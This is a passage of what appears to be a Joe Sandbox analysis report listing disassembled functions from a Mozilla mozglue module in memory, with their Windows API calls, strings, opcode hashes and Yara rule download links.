                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9BA0BE
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6C9BA0D5
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6C9BA0EB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 956590011-0
                                                                                                                                                                                                                                                                                        • Opcode ID: acd5921a4f095752639b4424e4839b5adc42aac1a8b813739dc33195030f9f94
                                                                                                                                                                                                                                                                                        • Instruction ID: ecde012a48f83f510aedcc496e44155f46f8d42b30e62f4fa8a7f7c302b9d0ea
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acd5921a4f095752639b4424e4839b5adc42aac1a8b813739dc33195030f9f94
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD61B075409601EFD711CF18C48059AB3F5FFA8328F54865DE899AB702EB32E986CBD1
                                                                                                                                                                                                                                                                                        Function 6C9BDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9BDC60
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C9BD38A,?), ref: 6C9BDC6F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,6C9BD38A,?), ref: 6C9BDCC1
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C9BD38A,?), ref: 6C9BDCE9
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C9BD38A,?), ref: 6C9BDD05
                                                                                                                                                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C9BD38A,?), ref: 6C9BDD4A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1842996449-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ecfffbfa313c3119c73eeb325b9484e013549dd20b99b9b7262b79afb88f6f98
                                                                                                                                                                                                                                                                                        • Instruction ID: bda830ba8e9d07c23ddbb99ef156ffab56e8241b9105d3147a1d6a04f98b4e7a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecfffbfa313c3119c73eeb325b9484e013549dd20b99b9b7262b79afb88f6f98
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E417AB6A00605DFCB00CF99C88099BB7F9FF98314B254569D946ABB14D731FC04CB90
                                                                                                                                                                                                                                                                                        Function 6C9A6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99FA80: GetCurrentThreadId.KERNEL32 ref: 6C99FA8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99FA80: AcquireSRWLockExclusive.KERNEL32(6C9EF448), ref: 6C99FA99
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9A6727
                                                                                                                                                                                                                                                                                        • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C9A67C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B4290: memcpy.VCRUNTIME140(?,?,6C9C2003,6C9C0AD9,?,6C9C0AD9,00000000,?,6C9C0AD9,?,00000004,?,6C9C1A62,?,6C9C2003,?), ref: 6C9B42C4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                                        • String ID: data
                                                                                                                                                                                                                                                                                        • API String ID: 511789754-2918445923
                                                                                                                                                                                                                                                                                        • Opcode ID: 0ed58ec16937e4c8d389af97f2a2458db7abb2c9545fe2fd21312623da1fa46f
                                                                                                                                                                                                                                                                                        • Instruction ID: 27cf290558b4b556e66a7ab402e139e226f6ca5b24cf264ed304f6a24c42e796
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ed58ec16937e4c8d389af97f2a2458db7abb2c9545fe2fd21312623da1fa46f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21D1CFB5A093409FD724CF68C840B9FB7E5AFE5308F14892DE18997B51DB30E94ACB52
                                                                                                                                                                                                                                                                                        Function 6C9BC810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C9BC82D
                                                                                                                                                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C9BC842
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9BCAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C9DB5EB,00000000), ref: 6C9BCB12
                                                                                                                                                                                                                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C9BC863
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C9BC875
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C9DB636,?), ref: 6C99B143
                                                                                                                                                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C9BC89A
                                                                                                                                                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9BC8BC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2745304114-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f14278452ac75d6b480271c79164f3578cad342ecba4a36db2dd3bd3099fa406
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e29acee6d39ceda362bea6af0e471b8215f832c35521ce6ad83c8b21b797bf6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f14278452ac75d6b480271c79164f3578cad342ecba4a36db2dd3bd3099fa406
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F11B671B043099BCB00EFA4D8C98AF7B78EFAD354B240129E606A7340DB30DD44CBA5
                                                                                                                                                                                                                                                                                        Function 6C99D5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C96EB57,?,?,?,?,?,?,?,?,?), ref: 6C99D652
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C96EB57,?), ref: 6C99D660
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C96EB57,?), ref: 6C99D673
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C99D888
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID: |Enabled
                                                                                                                                                                                                                                                                                        • API String ID: 4142949111-2633303760
                                                                                                                                                                                                                                                                                        • Opcode ID: 3dd7aeb42162e3b76c07d41746f3cda3fd2692c32bee23c7cc04d78285dd1d8d
                                                                                                                                                                                                                                                                                        • Instruction ID: b8af270e45bdffee28c4378cb8aefa02d6772f6bfeb40123ad225c5741cf5aeb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dd7aeb42162e3b76c07d41746f3cda3fd2692c32bee23c7cc04d78285dd1d8d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02A126B1A043089FDB11CF69C4D07AEBBF5AF69318F18805DD8896B742D735E845CBA1
                                                                                                                                                                                                                                                                                        Function 6C99F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C99F480
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96F100: LoadLibraryW.KERNEL32(shell32,?,6C9DD020), ref: 6C96F122
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C96F132
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6C99F555
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9714B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C971248,6C971248,?), ref: 6C9714C9
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9714B0: memcpy.VCRUNTIME140(?,6C971248,00000000,?,6C971248,?), ref: 6C9714EF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C96EEE3
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C99F4FD
                                                                                                                                                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C99F523
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                                        • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                                        • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                                                        • Opcode ID: f0809039aa98b8bffe352b9896b2b53eb318512f8ff30fa16e5195ad00bbadcc
                                                                                                                                                                                                                                                                                        • Instruction ID: 8c5bd9dcc1ca1ec3e83013aad948de609b8527faf0f8bff0275acd0e163c9e48
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0809039aa98b8bffe352b9896b2b53eb318512f8ff30fa16e5195ad00bbadcc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E41B4706087109FE720DF69C844BAAF7F8AF5931CF504A1CF59593650EB30D989CB92
                                                                                                                                                                                                                                                                                        Function 6C9C74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6C9C7526
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C9C7566
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C9C7597
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                                                        • Opcode ID: 78bd69e6cc9de08f997953425cbadece11e702694828791c726ffa96284de28e
                                                                                                                                                                                                                                                                                        • Instruction ID: b34dbb61f3bb58296828123f3a262f23145ddabcd0c8eb0e865547f2a73f8be7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78bd69e6cc9de08f997953425cbadece11e702694828791c726ffa96284de28e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2213731B06500A7DF158FEAE814E49337AEFBFB28F24452AD50547F40CB32E94586A7
                                                                                                                                                                                                                                                                                        Function 6C9CA7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EF770,-00000001,?,6C9DE330,?,6C98BDF7), ref: 6C9CA7AF
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C98BDF7), ref: 6C9CA7C2
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000018,?,6C98BDF7), ref: 6C9CA7E4
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EF770), ref: 6C9CA80A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                                                                                                                                                                                                                                                                        • String ID: accelerator.dll
                                                                                                                                                                                                                                                                                        • API String ID: 2442272132-2426294810
                                                                                                                                                                                                                                                                                        • Opcode ID: 60cc50df80690b318ac39aea4f9646e067afb012444b255b9fbcf96ded9a99a7
                                                                                                                                                                                                                                                                                        • Instruction ID: 4bf3bc28bd92b3789a2120d5ad3a449bcb9dd41ed873b4e5ad4ac0139de51f16
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60cc50df80690b318ac39aea4f9646e067afb012444b255b9fbcf96ded9a99a7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98017C707043049FDB448F96E884C2177B8FFA9B59715806AE8098B741DB71E800CBA2
                                                                                                                                                                                                                                                                                        Function 6C96F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ole32,?,6C96EE51,?), ref: 6C96F0B2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C96F0C2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C96F0DC
                                                                                                                                                                                                                                                                                        • ole32, xrefs: 6C96F0AD
                                                                                                                                                                                                                                                                                        • Could not find CoTaskMemFree, xrefs: 6C96F0E3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                        • String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
                                                                                                                                                                                                                                                                                        • API String ID: 2574300362-1578401391
                                                                                                                                                                                                                                                                                        • Opcode ID: 6c386ed7649f0acf1d4567884e2be534ce50e18ec6d4a724cc58575a3854c6ed
                                                                                                                                                                                                                                                                                        • Instruction ID: e5191b5302369395f11c9256288a5f5636944168439595698dd95ff82df3e1c5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c386ed7649f0acf1d4567884e2be534ce50e18ec6d4a724cc58575a3854c6ed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96E0DF7134C305DBBF541B63AC09B2637BC6FBF60D324802EE512C1F95EA20D010C66A
                                                                                                                                                                                                                                                                                        Function 6C9A0080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C977204), ref: 6C9A0088
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C9A00A7
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C977204), ref: 6C9A00BE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: CryptCATAdminAcquireContext2$wintrust.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-3385133079
                                                                                                                                                                                                                                                                                        • Opcode ID: f1af009ecd04ba6e6efd1e786ca5e6f13e16373f15eeb597c51f83f44c9427c9
                                                                                                                                                                                                                                                                                        • Instruction ID: 6fced4a158f11db58b59a0793fa93da84f9301a263f61e9020566c42ba49b7a9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1af009ecd04ba6e6efd1e786ca5e6f13e16373f15eeb597c51f83f44c9427c9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E01270608340ABEF80AFA6A8087023AF8AF6F348F60406AA912C2690DBB4C000CF55
                                                                                                                                                                                                                                                                                        Function 6C9A00D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C977235), ref: 6C9A00D8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C9A00F7
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C977235), ref: 6C9A010E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • wintrust.dll, xrefs: 6C9A00D3
                                                                                                                                                                                                                                                                                        • CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C9A00F1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                        • String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
                                                                                                                                                                                                                                                                                        • API String ID: 145871493-2559046807
                                                                                                                                                                                                                                                                                        • Opcode ID: 05b26c0f71cace539d614dbd5c3fb8dc160b54f8cd1d22ed105a81019b6d3b9a
                                                                                                                                                                                                                                                                                        • Instruction ID: 37286910a3a8301dae7431877015268789472c8fc5b906e8427d5c699eb039fc
